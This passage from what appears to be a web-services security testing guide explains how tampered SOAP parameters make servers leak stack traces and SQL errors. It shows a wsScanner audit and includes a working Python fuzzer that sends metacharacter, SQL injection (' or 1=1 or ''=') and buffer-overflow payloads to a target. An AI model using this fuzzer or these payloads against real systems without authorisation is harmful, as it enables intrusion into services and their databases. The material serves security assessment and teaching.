Tampering with Data Types of the SOAP Message

Here is an example of a SOAP request that takes an array as input.

<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"
    xmlns:tns="http://www.example.com/lixusnet/example.jws"
    xmlns:types="http://www.example.com/lixusnet/example.jws/encodedTypes"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
    <tns:solvesys>
      <Arr href="#id1" />
    </tns:solvesys>
    <soapenc:Array id="id1" soapenc:arrayType="xsd:double">
      <Item>0</Item>
    </soapenc:Array>
  </soap:Body>
</soap:Envelope>

The following node gives away information about the input parameter: it is an array of items.

<soapenc:Array id="id1" soapenc:arrayType="xsd:double">

The arrayType attribute tells us the element type, xsd:double; a fully specified SOAP-encoded array would also carry its dimension (for example, xsd:double[2] for two doubles). Rather than supplying the array the service expects, we send a malformed one containing a single <Item>0</Item> node and watch what comes back in the faultstring.

<?xml version="1.0" encoding="utf-16"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <soapenv:Body>
    <soapenv:Fault>
      <faultcode>soapenv:Server.userException</faultcode>
      <faultstring>org.xml.sax.SAXParseException: Content is not allowed in prolog.</faultstring>
      <detail />
    </soapenv:Fault>
  </soapenv:Body>
</soapenv:Envelope>

The faultstring carries a SAX parsing exception. This is a significant information leak: the exception class, org.xml.sax.SAXParseException, reveals which XML parser the application server runs requests through and that the server side is Java, and the Server.userException faultcode is the form Apache Axis produces. Similarly, if an attacker passes a value of the wrong data type to the Web service, the following error is generated.

<?xml version="1.0" encoding="utf-16"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <soapenv:Body>
    <soapenv:Fault>
      <faultcode>soapenv:Server.userException</faultcode>
      <faultstring>java.lang.IllegalArgumentException: Illegal pattern character 'r'</faultstring>
      <detail />
    </soapenv:Fault>
  </soapenv:Body>
</soapenv:Envelope>

Each leak like this adds a piece to the Web services jigsaw puzzle. The IllegalArgumentException above, for instance, is the message java.text.SimpleDateFormat raises for a bad pattern, so the tampered parameter evidently flows into a date-formatting routine. As this information is collected and put into perspective, we can draw a better picture of the technology in use, the application layer logic and other significant details.

A complete assessment of .NET Web services can be done using wsScanner. It has an auto audit feature as part of the component wsAudit (see Figure 12.3). Here is a sample of how to go about assessment, once profiling is done. You will need to start the proxy listener and make sample requests to Web services with this tool to capture the request. Only then proceed with a full parameter injection audit.

[Figure 12.3 shows the wsAudit Properties dialog. Its check-box panels, each with an Enter Characters field and a Select Parameter box, are: MetaCharacters, Bruteforce (User, Password, Select file), Data Types Audit, SQL Injection, XPath Injection, Attack String (' or 1=1 or ''='), Buffer Overflow (Buffer Character, Start Size, End Size, Increment) and SOAP Response Analysis (Rule File (Regex)), followed by a Note field and an OK button.]

FIGURE 12.3 Auditing the Web services.

It is also possible to launch metacharacter injection and data type mismatch attacks on Web services. Once the list of characters has been selected, the tool will send requests to the server after appending that character to each of the SOAP request parameters. We can see the following request and response for auto audit.

POST /ws/dvds4less.asmx HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.832)
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/getProductInfo"
Host: 192.168.1.55
Content-Length: 317

<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><getProductInfo xmlns="http://tempuri.org/"><id>a</id></getProductInfo></soap:Body></soap:Envelope>

*** Response ***

HTTP/1.1 500 Internal Server Error.
Server: Microsoft-IIS/5.0
Date: Sun, 16 Sep 2007 09:15:37 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Content-Length: 879

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <soap:Body>
    <soap:Fault>
      <faultcode>soap:Server</faultcode>
      <faultstring>System.Web.Services.Protocols.SoapException: Server was unable to process request. ---&gt; System.Data.SqlClient.SqlException: Invalid column name 'a'.
   at System.Data.SqlClient.SqlCommand.ExecuteReader(CommandBehavior cmdBehavior, RunBehavior runBehavior, Boolean returnStream)
   at System.Data.SqlClient.SqlCommand.ExecuteReader()
   at dvds4less.getProductInfo(String id) in C:\Inetpub\wwwroot\dvds4less.net\ws\dvds4less.asmx:line 29
   --- End of inner exception stack trace ---</faultstring>
      <detail />
    </soap:Fault>
  </soap:Body>
</soap:Envelope>

Once all requests have been sent, manually inspect every response for suspicious faultstrings. The one above is a good example: Invalid column name 'a' means SQL Server tried to resolve the injected value as an identifier, so the id parameter is placed into the SQL statement without quoting, and the stack trace adds the data access layer (SqlClient), the source path of the service and the line number of the vulnerable call.
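The auto audit loop described above, as an added Python example that is not wsScanner's code: it parses a captured request, generates one mutated envelope per parameter and payload for each check box (metacharacters, data types, SQL injection, buffer sizes) and posts them, keeping the HTTP 500 fault bodies for later inspection. The baseline request, the target URL and the payload lists are assumptions modelled on the dvds4less request above.

```python
import copy
import urllib.error
import urllib.request
from xml.etree import ElementTree as ET

SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"
ET.register_namespace("soap", SOAP_ENV)

# Baseline request as the proxy listener would capture it. The unmutated value 1,
# the target URL and the payload lists are assumptions modelled on the page's request.
OPERATION_NS = "http://tempuri.org/"
CAPTURED = (
    '<?xml version="1.0" encoding="utf-8"?>'
    '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" '
    'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" '
    'xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body>'
    '<getProductInfo xmlns="http://tempuri.org/"><id>1</id></getProductInfo>'
    '</soap:Body></soap:Envelope>'
)
TARGET = "http://192.168.1.55/ws/dvds4less.asmx"
SOAP_ACTION = "http://tempuri.org/getProductInfo"

# Payload sets standing in for the wsAudit check boxes (assumed lists).
METACHARACTERS = ["'", '"', "<", ">", "&", ";", "%", "\\", "|"]
DATA_TYPE_MISMATCH = ["a", "-1", "1.5", "2147483648", "true", ""]
SQL_INJECTION = ["' or 1=1 or ''='"]


def local_name(tag):
    return tag.rsplit("}", 1)[-1]


def parameters(root):
    """Leaf elements under the operation element inside soap:Body: the parameters."""
    body = root.find(f"{{{SOAP_ENV}}}Body")
    operation = list(body)[0]
    return [el for el in operation.iter() if el is not operation and len(el) == 0]


def mutate(envelope, payloads, mode="append"):
    """Yield (parameter name, payload, envelope text), one request per
    parameter x payload. 'append' tacks the payload onto the captured value
    (metacharacter audit); 'replace' substitutes it (data type audit)."""
    base = ET.fromstring(envelope)
    for index in range(len(parameters(base))):
        for payload in payloads:
            root = copy.deepcopy(base)
            target = parameters(root)[index]
            if mode == "append":
                target.text = (target.text or "") + payload
            else:
                target.text = payload
            text = ET.tostring(root, encoding="unicode", default_namespace=OPERATION_NS)
            yield local_name(target.tag), payload, text


def buffer_payloads(start, end, increment, char="A"):
    """Strings of increasing length, as the Buffer Overflow panel generates them."""
    return [char * size for size in range(start, end + 1, increment)]


def send(url, soap_action, envelope, timeout=10):
    """POST one envelope. A SOAP fault arrives as HTTP 500, so keep that body too."""
    request = urllib.request.Request(
        url, data=envelope.encode("utf-8"), method="POST",
        headers={"Content-Type": "text/xml; charset=utf-8",
                 "SOAPAction": f'"{soap_action}"'})
    try:
        with urllib.request.urlopen(request, timeout=timeout) as response:
            return response.status, response.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def audit(url, soap_action, envelope):
    """Run every check against every parameter and collect the responses."""
    checks = [
        ("metacharacters", METACHARACTERS, "append"),
        ("data types", DATA_TYPE_MISMATCH, "replace"),
        ("sql injection", SQL_INJECTION, "append"),
        ("buffer overflow", buffer_payloads(256, 4096, 256), "replace"),
    ]
    results = []
    for check, payloads, mode in checks:
        for name, payload, text in mutate(envelope, payloads, mode):
            status, body = send(url, soap_action, text)
            results.append((check, name, payload, status, body))
    return results


if __name__ == "__main__":  # sends live traffic to TARGET
    for check, name, payload, status, body in audit(TARGET, SOAP_ACTION, CAPTURED):
        if "faultstring" in body:
            print(check, name, repr(payload), status)
```

Because the payload is set as element text, the serializer escapes <, > and & (a < becomes &lt;), so these requests exercise the application's handling of the decoded value rather than the XML parser itself; to tamper with the envelope structure, substitute the payload into the raw request text instead. The buffer overflow check alone generates sixteen requests per parameter, the largest 4 KB, so narrow the range before pointing it at a production host.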
